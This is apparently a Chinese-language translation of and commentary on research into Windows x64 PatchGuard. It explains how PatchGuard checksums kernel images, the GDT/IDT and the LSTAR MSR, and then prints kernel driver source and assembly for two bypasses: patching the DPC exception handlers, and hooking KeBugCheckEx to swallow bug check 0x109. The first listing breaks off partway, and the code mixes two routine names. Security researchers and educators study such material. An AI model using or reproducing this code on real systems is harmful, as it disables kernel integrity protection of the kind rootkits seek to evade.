(1). 保护System images的sub-context的初始化
PG要保护的关键内核镜像(certain key kernel images)有:ntoskrnl.exe、hal.dll、ndis.sys。这些镜像中的符号地址会传递给nt!PgCreateImageSubContext()函数:
NTSTATUS PgCreateImageSubContext(
IN PPATCHGUARD_CONTEXT ParentContext,
IN LPVOID SymbolAddress);
对于ntoskrnl.exe,传递的符号地址是nt!KiFilterFiberContext的地址;对于hal.dll,传递的符号地址是HalInitializeProcessor的地址;对于ndis.sys,传递的是其入口地址,这个入口地址是通过调用nt!GetModuleEntryPoint函数获得。PgCreateImageSubContext()函数保护这些images所采用的方法是产生可区分的PG sub-contexts。
第一个sub-context保存image的sections的checksum(有些例外)。第二个和第三个sub-context分别保存image的IAT和Import Directory的checksum。分配这些sub-contexts的所有例程都会调用一个共同的函数(shared routine。个人觉得将shared翻译成“共同的”或“相同的”比“共享的”好^.^),而这个“共同的”函数负责产生一个用于保存一段内存块的checksum,主要是使用这个随机的XOR值和保存在parent PG context结构体中的用作随机循环位的那个随机数(原文是:These routines all make use of a shared routine that is responsible for generating a protection sub-context that holds the checksum for a block of memory using the random XOR key and random rotate bits stored in the parent PatchGuard context structure.)。这个函数的定义如下:
typedef struct BLOCK_CHECKSUM_STATE
{
ULONG Unknown;
ULONG64 BaseAddress;
ULONG BlockSize;
ULONG Checksum;
} BLOCK_CHECKSUM_STATE, *PBLOCK_CHECKSUM_STATE;
PPATCHGUARD_SUB_CONTEXT PgCreateBlockChecksumSubContext(
IN PPATCHGUARD_CONTEXT Context,
IN ULONG Unknown,
IN PVOID BlockAddress,
IN ULONG BlockSize,
IN ULONG SubContextSize,
OUT PBLOCK_CHECKSUM_STATE ChecksumState OPTIONAL);
BLOCK_CHECKSUM_STATE结构体中的Unknown成员值来自nt!PgCreateBlockChecksumSubContext()函数的Unknown参数,在调试的时候,这个值是0,具体有何用,未知。
PgCreateBlockChecksumSubContext()函数计算checksum的算法很简单,其伪代码如下:
ULONG64 Checksum = Context->RandomHashXorSeed;
ULONG Checksum32;
// Checksum 64-bit blocks
while (BlockSize >= sizeof(ULONG64))
{
Checksum ^= *(PULONG64)BaseAddress;
Checksum = RotateLeft(Checksum, Context->RandomHashRotateBits);
BlockSize -= sizeof(ULONG64);
BaseAddress += sizeof(ULONG64);
}
// Checksum aligned blocks
while (BlockSize-- > 0)
{
Checksum ^= *(PUCHAR)BaseAddress;
Checksum = RotateLeft(Checksum, Context->RandomHashRotateBits);
BaseAddress++;
}
Checksum32 = (ULONG)Checksum;
Checksum >>= 31;
do
{
Checksum32 ^= (ULONG)Checksum;
Checksum >>= 31;
} while (Checksum);
Checksum32就是最后得到的checksum,其会保存到BLOCK_CHECKSUM_STATE中。
为了达到初始化image sections的checksum的目的,nt!PgCreateImageSubContext()函数会调用如下函数:
PPATCHGUARD_SUB_CONTEXT PgCreateImageSectionSubContext(
IN PPATCHGUARD_CONTEXT ParentContext,
IN PVOID SymbolAddress,
IN ULONG SubContextSize,
IN PVOID ImageBase);
PgCreateImageSectionSubContext()函数首先检测nt!KiOpPrefetchPatchCount值是否为0。如果不为0,则创建的块校验和上下文(block checksum context)就不会覆盖image中的所有sections。否则,这个函数就会枚举image中的所有节,并为每个节都计算一个checksum,但不包括INIT、PAGEVRFY、PAGESPEC和PAGEKD这些节。
另外,PgCreateImageSectionSubContext()函数还会调用nt!PgCreateBlockChecksumSubContext()函数来计算image的IAT和Import Directory。
(3). 保护GDT/IDT的sub-context的初始化
GDT是用来描述内核所使用的内存段(memory segments)的。对恶意的应用程序来说,GDT是有利可图的,因为通过修改一些特定的GDT入口就可以让不具有特权等级的(non-privileged)、用户模式的应用程序能够修改内核内存。IDT对恶意的context和合法的context来说都是很有用的。在某些情况下,第三方可能希望在特定的硬件或软件中断传到内核前就截获它们,即hook IDT。
PG保护GDT/IDT的原理,主要是调用nt!PgCreateBlockChecksumSubContext()函数来实现的,当然需传入各自的context。由于保存GDT和IDT信息的寄存器是与给定的处理器相关联的,那么PG就需要在每个处理器上为这2个表创建互不影响的context。要为给定的处理器获取GDT和IDT的地址,PG首先调用nt!KeSetAffinityThread()函数,以确保自己运行在这个特定的处理器上。之后,PG调用nt!KiGetGdtIdt()函数来获得GDT和IDT的基地址。这个函数的定义如下:
VOID KiGetGdtIdt(
OUT PVOID *Gdt,
OUT PVOID *Idt);
虽然获取GDT和IDT基地址,是用的一个函数,但在真正进行保护GDT和IDT时,是在两个不同的函数中进行的。它们分别是:nt!PgCreateGdtSubContext() 和 nt!PgCreateIdtSubContext()。定义如下:
PPATCHGUARD_SUB_CONTEXT PgCreateGdtSubContext(
IN PPATCHGUARD_CONTEXT ParentContext,
IN UCHAR ProcessorNumber);
PPATCHGUARD_SUB_CONTEXT PgCreateIdtSubContext(
IN PPATCHGUARD_CONTEXT ParentContext,
IN UCHAR ProcessorNumber);
这两个函数会在所有的处理器上被调用。nt!KeNumberProcessors指示哪个处理器,它们就在哪个处理器上调用。
(4). 保护Processor MSRs的sub-context的初始化
最新最棒的处理器已经极大地优化了用户模式切换到内核模式所使用的方法。在此之前,大多数的OS,包括Windows,都使用一个软中断来处理系统调用。新一代的处理器采用命令来进行系统调用,如syscall何sysenter命令。这就可能用到MSR(processor-defined Model-Specific Register)。MSR就包含了即将调用的内核函数(与用户态函数对应)的地址。在x64架构上,控制该地址的MSR被称为LSTAR(Long System Target-Address Register) MSR。与MSR相关联的code是0xc0000082。在系统启动过程中,x64内核将MSR初始化为nt!KiSystemCall64()函数的地址。
微软为了防止第三方通过改变LSTAR MSR的值,从而hooking系统调用,PG在PgCreateMsrSubContext()函数中创建了类型为7(type 7)的sub-context结构体并缓存MSR的值:
PPATCHGUARD_SUB_CONTEXT PgCreateMsrSubContext(
IN PPATCHGUARD_CONTEXT ParentContext,
IN UCHAR Processor);
与GDT/IDT的保护一样,LSTAR MSR的值也是与处理器相关的,需在每个处理器上都各自保留一份。为确保是从正确的处理器上获得的MSR值,PG调用nt!KeSetAffinityThread函数以确保获取MSR值的线程是运行在相应的处理器上。
NTSTATUS DisablePatchGuard()
{
UNICODE_STRING SymbolName;
NTSTATUS Status = STATUS_SUCCESS;
PVOID * DpcRoutines = NULL;
PCHAR NtBaseAddress = NULL;
ULONG Offset;
RtlInitUnicodeString(
&SymbolName,
L"__C_specific_handler");
do
{
//
// Get the base address of nt
//
if (!RtlPcToFileHeader(
MmGetSystemRoutineAddress(&SymbolName),
(PCHAR *)&NtBaseAddress))
{
Status = STATUS_INVALID_IMAGE_FORMAT;
break;
}
//
// Search the image to find the first occurrence of:
//
// "AcpSFileIpFIIrp MutaNtFsNtrfSemaTCPc"
//
// This is the fake tag pool array that is used to allocate protection contexts.
//
__try
{
for (Offset = 0; !DpcRoutines; Offset += 4)
{
//
// If we find a match for the fake pool tag array, the DPC routine
// addresses will immediately follow.
//
if (memcmp(
NtBaseAddress + Offset,
CurrentFakePoolTagArray,
sizeof(CurrentFakePoolTagArray) - 1) == 0)
{
DpcRoutines = (PVOID *)(NtBaseAddress +
Offset + sizeof(CurrentFakePoolTagArray) + 3);
}
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
//
// If an exception occurs, we failed to find it. Time to bail out.
//
Status = GetExceptionCode();
break;
}
DebugPrint(("DPC routine array found at %p.",DpcRoutines));
//
// Walk the DPC routine array.
//
for (Offset = 0; DpcRoutines[Offset] && NT_SUCCESS(Status); Offset++)
{
PRUNTIME_FUNCTION Function;
ULONG64 ImageBase;
PCHAR UnwindBuffer;
UCHAR CodeCount;
ULONG HandlerOffset;
PCHAR HandlerAddress;
PVOID LockedAddress;
PMDL Mdl;
//
// If we find no function entry, then go on to the next entry.
//
if ((!(Function = RtlLookupFunctionEntry(
(ULONG64)DpcRoutines[Offset],
&ImageBase,
NULL))) || (!Function->UnwindData))
{
Status = STATUS_INVALID_IMAGE_FORMAT;
continue;
}
//
// Grab the unwind exception handler address if we’re able to find one.
//
UnwindBuffer = (PCHAR)(ImageBase + Function->UnwindData);
CodeCount = UnwindBuffer[2];
//
// The handler offset is found within the unwind data that is specific
// to the language in question. Specifically, it’s +0x10 bytes into
// the structure not including the UNWIND_INFO structure itself and any
// embedded codes (including padding). The calculation below accounts
// for all these and padding.
//
HandlerOffset = *(PULONG)((ULONG64)(UnwindBuffer + 3 +
(CodeCount * 2) + 20) & ~3);
//
// calculate the full address of the handler to patch.
//
HandlerAddress = (PCHAR)(ImageBase + HandlerOffset);
DebugPrint(("Exception handler for %p found at %p (unwind %p).",
DpcRoutines[Offset],
HandlerAddress,
UnwindBuffer));
//
// Finally, patch the routine to simply return with 1. We’ll patch with:
//
// 6A01 push byte 0x1
// 58 pop eax
// C3 ret
//
//
// Allocate a memory descriptor for the handler’s address.
//
if (!(Mdl = MmCreateMdl( NULL, (PVOID)HandlerAddress, 4)))
{
Status = STATUS_INSUFFICIENT_RESOURCES;
continue;
}
//
// Construct the Mdl and map the pages for kernel-mode access.
//
MmBuildMdlForNonPagedPool(Mdl);
if (!(LockedAddress = MmMapLockedPages(Mdl, KernelMode)))
{
IoFreeMdl(Mdl);
Status = STATUS_ACCESS_VIOLATION;
continue;
}
这个方法的优点是其比较小且相对简单,容错能力也比较强。缺点是其要求pool tag数组刚好就在DPC函数地址数组之前且紧挨着,且寻找pool tag数组依赖于一个固定值,而微软将来完全有可能消除该固定值。鉴于这些原因,在产品中最好不要使用该方法。
4.2. Hooking KeBugCheckEx
PG保护无法避免的一个事实就是其必须以某种方法报告验证不一致。事实上,这个方法在检测到打补丁的操作后,必须关闭系统,以防止第三方厂商继续运行代码。这种方法就是调用nt!KeBugCheckEx()函数,bug check code就是之前的0x109。这里采用BSoD,而不是黑屏、直接关机或重启系统的目的是让用户知道发生了什么。(微软还是很厚道的~~~)
本文的作者想绕过这个技术的第一个想法就是让nt!KeBugCheckEx()函数返回到调用者的调用帧(caller’s caller frame)中。这样做是有必要的,在调用nt!KeBugCheckEx()函数后,因为编译器立即插入了一个调试器陷阱(debugger trap),所以就不可能返回到调用者那里了,但还是有可能返回到调用者的调用帧中。举个例:FuncA调用FuncB,FuncB触发异常,导致nt!KeBugCheckEx()函数被调用,在不能回到FuncB的情况下,我们让它回到FuncA的帧中(caller’s call frame)。但是,我们之前已说过,PG已经将调用nt!KeBugCheckEx()函数之前的栈都清0了。因此,想hook nt!KeBugCheckEx()函数似乎是死路一条。恰恰相反,不是!(被作者吓出一身冷汗~~~)
由此衍生出一种方法,你不用担心存储在寄存器或栈上的context,而是利用“每个线程都会保留其自身的入口点地址”这个特征。对于系统工作线程(system worker threads),这个入口点通常就指向nt!ExpWorkerThread ()这样的函数。因为有多个系统工作线程都指向nt!ExpWorkerThread (),该如何是好?不用担心。传递给这个函数的context参数与具体的线程不相干,因为系统工作线程只是用来处理工作项(work items)和超时的DPC例程。知道了这一点,这个方法归结起来,就是hook nt!KeBugCheckEx()函数并判断bug check code是否是0x109。如果不是0x109,则直接调用原始的nt!KeBugCheckEx()函数。如果是0x109,则这个线程可以重启,重启的方法是修复这个调用线程的栈指针(当前栈指针减0x8),然后跳转到这个线程的StartAddress处。这样做的结果是,线程继续回去一如既往地处理work items和超时的DPC例程。
有个很明显的方法就是简单地结束这个调用线程,但这样做是不可能的。因为OS会持续跟踪系统工作线程并检测其中是否有退出的。系统工作线程的退出会导致系统BSoD。Hook nt!KeBugCheckEx()函数的算法如下:
== ext.asm==============
.data
EXTERN OrigKeBugCheckExRestorePointer:PROC
EXTERN KeBugCheckExHookPointer:PROC
.code
;
; Points the stack pointer at the supplied argument and returns to the caller.
;
public AdjustStackCallPointer
AdjustStackCallPointer PROC
mov rsp, rcx
xchg r8, rcx
jmp rdx
AdjustStackCallPointer ENDP
;
; Wraps the overwritten preamble of KeBugCheckEx.
;
public OrigKeBugCheckEx
OrigKeBugCheckEx PROC
mov [rsp+8h], rcx
mov [rsp+10h], rdx
mov [rsp+18h], r8
lea rax, [OrigKeBugCheckExRestorePointer]
jmp qword ptr [rax]
OrigKeBugCheckEx ENDP
END
== antipatch.c===========
//
// Both of these routines reference the assembly code described
// above
//
extern VOID OrigKeBugCheckEx(
IN ULONG BugCheckCode,
IN ULONG_PTR BugCheckParameter1,
IN ULONG_PTR BugCheckParameter2,
IN ULONG_PTR BugCheckParameter3,
IN ULONG_PTR BugCheckParameter4);
extern VOID AdjustStackCallPointer(
IN ULONG_PTR NewStackPointer,
IN PVOID StartAddress,
IN PVOID Argument);
//
// mov eax, ptr
// jmp eax
//
static CHAR HookStub[] =
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xe0";
//
// The offset into the ETHREAD structure that holds the start routine.
//
static ULONG ThreadStartRoutineOffset = 0;
//
// The pointer into KeBugCheckEx after what has been overwritten by the hook.
//
PVOID OrigKeBugCheckExRestorePointer;
VOID KeBugCheckExHook(
IN ULONG BugCheckCode,
IN ULONG_PTR BugCheckParameter1,
IN ULONG_PTR BugCheckParameter2,
IN ULONG_PTR BugCheckParameter3,
IN ULONG_PTR BugCheckParameter4)
{
PUCHAR LockedAddress;
PCHAR ReturnAddress;
PMDL Mdl = NULL;
//
// Call the real KeBugCheckEx if this isn’t the bug check code we’re looking
// for.
//
if (BugCheckCode != 0x109)
{
DebugPrint(("Passing through bug check %.4x to %p.",
BugCheckCode,
OrigKeBugCheckEx));
OrigKeBugCheckEx(
BugCheckCode,
BugCheckParameter1,
BugCheckParameter2,
BugCheckParameter3,
BugCheckParameter4);
}
else
{
PCHAR CurrentThread = (PCHAR)PsGetCurrentThread();
PVOID StartRoutine = *(PVOID **)(CurrentThread + ThreadStartRoutineOffset);
PVOID StackPointer = IoGetInitialStack();
DebugPrint(("Restarting the current worker thread %p at %p (SP=%p, off=%lu).",
PsGetCurrentThread(),
StartRoutine,
StackPointer,
ThreadStartRoutineOffset));
//
// Shift the stack pointer back to its initial value and call the routine. We
// subtract eight to ensure that the stack is aligned properly as thread
// entry point routines would expect.
//
AdjustStackCallPointer((ULONG_PTR)StackPointer - 0x8,
StartRoutine,
NULL);
}
//
// In either case, we should never get here.
//
__debugbreak();
}
VOID DisablePatchProtectionSystemThreadRoutine(
IN PVOID Nothing)
{
UNICODE_STRING SymbolName;
NTSTATUS Status = STATUS_SUCCESS;
PUCHAR LockedAddress;
PUCHAR CurrentThread = (PUCHAR)PsGetCurrentThread();
PCHAR KeBugCheckExSymbol;
PMDL Mdl = NULL;
RtlInitUnicodeString(
&SymbolName,
L"KeBugCheckEx");
do
{
//
// Find the thread’s start routine offset.
//
for (ThreadStartRoutineOffset = 0;
ThreadStartRoutineOffset < 0x1000;
ThreadStartRoutineOffset += 4)
{
if (*(PVOID **)(CurrentThread +
ThreadStartRoutineOffset) == (PVOID)DisablePatchProtection2SystemThreadRoutine)
break;
}
DebugPrint(("Thread start routine offset is 0x%.4x.",
ThreadStartRoutineOffset));
//
// If we failed to find the start routine offset for some strange reason,
// then return not supported.
//
if (ThreadStartRoutineOffset >= 0x1000)
{
Status = STATUS_NOT_SUPPORTED;
break;
}
//
// Get the address of KeBugCheckEx.
//
if (!(KeBugCheckExSymbol = MmGetSystemRoutineAddress(&SymbolName)))
{
Status = STATUS_PROCEDURE_NOT_FOUND;
break;
}
//
// Calculate the restoration pointer.
//
OrigKeBugCheckExRestorePointer = (PVOID)(KeBugCheckExSymbol + 0xf);
//
// Create an initialize the MDL.
//
if (!(Mdl = MmCreateMdl(
NULL,
(PVOID)KeBugCheckExSymbol,
0xf)))
{
Status = STATUS_INSUFFICIENT_RESOURCES;
break;
}
MmBuildMdlForNonPagedPool(
Mdl);
//
// Probe & Lock.
//
if (!(LockedAddress = (PUCHAR)MmMapLockedPages(
Mdl,
KernelMode)))
{
IoFreeMdl(
Mdl);
Status = STATUS_ACCESS_VIOLATION;
break;
}
//
// Set the aboslute address to our hook.
//
*(PULONG64)(HookStub + 0x2) = (ULONG64)KeBugCheckExHook;
DebugPrint(("Copying hook stub to %p from %p (Symbol %p).",
LockedAddress,
HookStub,
KeBugCheckExSymbol));
//
// Copy the relative jmp into the hook routine.
//
RtlCopyMemory(
LockedAddress,
HookStub,
0xf);
//
// Cleanup the MDL.
//
MmUnmapLockedPages(
LockedAddress,
Mdl);
IoFreeMdl(
Mdl);
} while (0);
}
//
// A pointer to KeBugCheckExHook
//
PVOID KeBugCheckExHookPointer = KeBugCheckExHook;
NTSTATUS DisablePatchProtection() {
OBJECT_ATTRIBUTES Attributes;
NTSTATUS Status;
HANDLE ThreadHandle = NULL;
InitializeObjectAttributes(
&Attributes,
NULL,
OBJ_KERNEL_HANDLE,
NULL,
NULL);
//
// Create the system worker thread so that we can automatically find the
// offset inside the ETHREAD structure to the thread’s start routine.
//
Status = PsCreateSystemThread(
&ThreadHandle,
THREAD_ALL_ACCESS,
&Attributes,
NULL,
NULL,
DisablePatchProtectionSystemThreadRoutine,
NULL);
if (ThreadHandle)
ZwClose(
ThreadHandle);
return Status;
}